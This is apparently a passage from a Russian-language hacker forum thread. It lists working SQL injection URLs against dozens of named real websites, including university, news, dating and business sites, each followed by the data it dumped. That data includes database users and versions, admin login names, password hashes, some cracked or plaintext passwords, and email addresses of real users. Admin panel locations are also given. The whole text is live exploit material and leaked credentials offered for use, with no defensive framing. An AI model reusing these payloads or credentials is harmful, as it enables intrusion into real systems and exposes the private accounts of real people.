PHP: http://iteco.ru/search.php?q=1'+union+select+1,user.usrname+from+mysql.user/* PHP: User max'@'localhost
experts.uchicago.edu Code: http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+--+ 4.0.24-standard Code: http://experts.uchicago.edu/experts.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+mysql.user+limit+0,1+--+ Code: root:0bd914e54597ba5d
Duke News http://dukemednews.duke.edu Сама скуля: Code: http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0 Выводим столбцы: Code: http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,3,4/* //будут в самом низу справа Выводим имя_пользователя:версию_бд:имя_бд: Code: http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user(),version(),database()),4/* [email protected]:4.0.18:news File_priv выкл: Code: http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,load_file(0x2F6574632F706173737764),4/* Есть доступ в mysql.user Code: http://dukemednews.duke.edu/news/article.php?id=6041+and+1=0+UNION+SELECT+1,2,concat_ws(0x3a,user,password),4+from+mysql.user/* Специально для вас расшифровал Code: mnogosearch:0547d8b07eba42f3:gh34mx92 root:623460e26f081bbc:mt01du01 web:761b2fc844890384:fr56nv29 Соседствующие сайты: Code: 1) news.mc.duke.edu 2) dukemednews.duke.edu 3) dukemednews.com 4) dukemednews.org админка: Code: http://dukemednews.duke.edu/admin Пока все
dialog.kz http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(0x3a3a,version(),user(),database()),6,7,8,9,10,11,12,13,14+from+users/*' 4.1.22-standard::dialog_hl@localhost::dialog_hl http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14+from+users/*' коннект хреновый, подберите поля и юзайте =)
http://www.dialog.kz/site.php?lan=ru&id=92&pub=-607+union+select+1,2,3,4,concat_ws(char(58),username,userpass),6,7,8,9,10,11,12,13,14+from+users/* admin:edf95addf04ca869faa73677ae66f5ea http://www.needaplacetogo.co.uk/fashion.asp?id=1+or+1=(SELECT+TOP+1+cast(M_USERNAME+as+nvarchar)%2B%27%3A%27%2Bcast(M_PASSWORD+as+nvarchar)+from+FORUM_MEMBERS+WHERE+MEMBER_ID=1)--
Италия Powered By Centro Studi Airone Уязвимость в скрипте leggi.php Примеры: Code: http://www.deltard.com/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database( ),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*& 4.1.22-standard-log:Sql84077_1:[email protected] Code: http://www.onecapital.it/homepage/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 4.0.27-standard-log:Sql20147_3:[email protected] Code: http://www.anguillarainforma.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 4.0.27-standard-log:Sql24700_1:[email protected] Code: http://www.101vetrine.it/leggi.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),databas e(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 4.0.27-standard-log:Sql72154_1:[email protected]
http://www.vedo.ru Code: http://www.vedo.ru/guest/guest.php?id=-1+union+select+1,2,username,user_password,5,6,7,8+from+phpbb_users/* admin:061ed190e137ee416c25b4e8658fd3a3 http://www.redbullreaccion.com/ Code: http://www.redbullreaccion.com/news_detail.php?lang=en&id=-1+union+select+1,2,3,user(),version(),6,database(),8,9,10/*
akce.cvut.cz https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1/* 4.1.11-Debian_4sarge7-log/akce/akce@localhost https://akce.cvut.cz/?node=cal-en&aid=-1'+union+select+1,2,3,4,concat_ws(0x2F,cast(username+as+binary),cast(password+as+binary)),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,1,1,1,1,1,1,1,1,1+from+users/* логин/хеш admin/*474ECE06942A2A91CBB3CB29D6C6F6A97C449630 прикольный хеш )) --------------------------------------------------------------------- http://www.balka.kharkov.ua/select_ss.php?tp=1&ss=-1+union+select+1,concat_ws(0x2F,version(),database(),user())/* 4.0.27/portal/adminkh@localhost -------------------------------------------------------------------- http://www.megaspravka.ru/news_show.php?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/* 4.1.22/wwwmegaspravkaru/megaspra@localhost
Италия gsteam.biz Code: http://www.gsteam.biz/video.php?media_ID=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4/* 4.1.11-Debian_4sarge7-log:gsteam_biz:jbag0007@localhost portalstiri.com Code: http://www.portalstiri.com/stiri.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5/* 4.1.22-standard : pstiri_pstiridb : pstiri@localhost emcquadro.com - ПОЗОР!!! Code: http://www.emcquadro.com/php.php?id_arg=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/* 4.1.22-standard-log:emcquadr_emcquadr13860:emcquadr_interne@localhost inputdata.net Code: http://www.inputdata.net/concordia/sezione.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6/* 4.0.27-standard-log:Sql19754_3:[email protected] infomedia2000.it Code: http://www.infomedia2000.it/prometeo/sezione.php?ID=1%20AND%20ascii(lower(substring(version(),1,1)))=51/* version() : 3.23.58 viaggiavventurenelmondo.it Code: http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9/* 5.0.37-log:cdocanm:[email protected] 201 таблица: Code: http://www.viaggiavventurenelmondo.it/nuovosito/eventi/cdoc/entry.php?id=-1+union+select+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+200,1/* Админ [ логин : пасс ] : Code: simz : stealthx77cdd
clubsss.com http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,2,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary)),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1/* 4.1.8-standard/conus_clubsss/conus_clubsss@localhost http://clubsss.com/lvov/show_club.php?club=-1+union+select+1,password,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1+from+users/* хеш колумн с логином не подобрал ( ----------------------------------------------------------------------------- myworld.md http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,version(),database(),user()),16,17,18,19,1,1,1,1,1,1,1,1,1/* 5.0.27/13195/13195@localhost http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,nic,mail_all,mail_secret,upass),16,17,18,19,1,1,1,1,1,1,1,1,1+from+user+limit+13,1/* логин/общее мыло/секретное мыло/пароль не хеш. sestri4ka/[email protected]/[email protected]/sanika ---------------------------------------------------------------------------- 4lover.de http://4lover.de/view.php?l=&id=-1'+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* 5.0.45/DB179434/[email protected] Есть доступ к information_schema
Code: http://www.afdspn.it/articolo.php?id=-1+union+select+1,concat_ws(0x3a,0x3a,user(),0x3a,database(),0x3a,version(),0x3a,0x3a)/*
Code: [B]http://www.puntoinformatico.it[/B]/download/file.asp?file_id=1+or+1=(SELECT+TOP+1+cast(Nickname+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+Utenti+where+ID_Prov=1)--
ENFIX, http://forum.antichat.ru/showpost.php?p=515305&postcount=3904 edu Code: http://www.choices.edu/resources/detail.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* 4.1.14-log:[email protected]:Choices
Code: http://www.emz-hanauer.de/public_main_modul.php?page_id=-1+union+select+1,user.usrname+from+mysql.user/* Code: Access denied for user 'db159514_2'@'127.0.0.2' to database 'mysql'
PR:5 Code: http://www.mgnsw.org.au/museums_and_galleries.php?id=-16+union+select+1,2,3,4,5,6/* mgnsw@localhost:4.1.20:mgnsw PR:5 Code: http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(char(58),version(),user(),database())+using%20latin1),5,6,7,8,9,10,11/* winston@localhost:4.1.11-Debian_4sarge7:churchilltrust PR:5 Code: http://www.wormweb.nl/agenda.php?id=-1+union+select+aes_decrypt(aes_encrypt(user,0x71),0x71)+from+users/* wormweb@localhost:4.1.12-Debian_0.dotdeb.0-log:wormweb01
spblove.ru http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,cast(version()+as+binary),cast(database()+as+binary),cast(user()+as+binary))/* 4.1.11-Debian_4sarge2-log/spblove8_main/[email protected] http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,login,password,icq)+from+ankets+limit+1300,1/* логин/хеш/уин ----------------------------------------------------------------------------- http://www.happywedding.ru/ladies_details.php?recordID=-1+UNION+SELECT+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/* 4.1.22-lk-log/hapwru_lady/hapwru_lady@localhost -------------------------------------------------------------------------- http://www.prosex.com.ua/news/show.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* 4.1.22/prosex/prosex@localhost -------------------------------------------------------------------------- http://news.13rus.ru/?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/* 4.1.22-standard/vitaliy_13rus/vitaliy_13rus@localhost -------------------------------------------------------------------------- ecoby.info http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11,12,13,14/* 4.1.21-standard-log/ecobyin_iac/ecobyin_User@localhost http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,ulogin,upass,umail),7,8,9,10,11,12,13,14+from+users/* логин/хеш/мейл
http://www.privacyconference2006.co.uk/ Code: http://www.privacyconference2006.co.uk/index.asp?PageID=-1+union+select+version(),2/* Не смог подобрать таблицы...
PR:3 Code: http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* [email protected]:5.0.45-log:sr0291893 Code: http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+24,1/* shiznit_users Code: http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name='shiznit_users'+limit+1,1/* nickname : email : password : id Code: http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),nickname,email,password,id),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+shiznit_users/* Code: [B]Bob:[email protected]:shiznitgod:1[/B] andy:andy:12345:8 Pandaemonium:[email protected]:preacher:10 thefuckestuppest:[email protected]:wolf359:11 blamfish:[email protected]:kamikaze:12 monkey_man:[email protected]:monkeyman:13 Geffdof:[email protected]:kennym:14 ... PR:4 Code: http://www.lunarenergy.co.uk/newsDetail.php?id=-12+union+select+1,2,3,4,5,convert(concat_ws(char(58),version(),user(),database())using%20latin1),7/* 4.1.12-log:[email protected]:sca
HTML: http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*&item=galleries HTML: http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries Admin login: BG password (hash): 7fd6766a2eef757f37d022422fe8aff5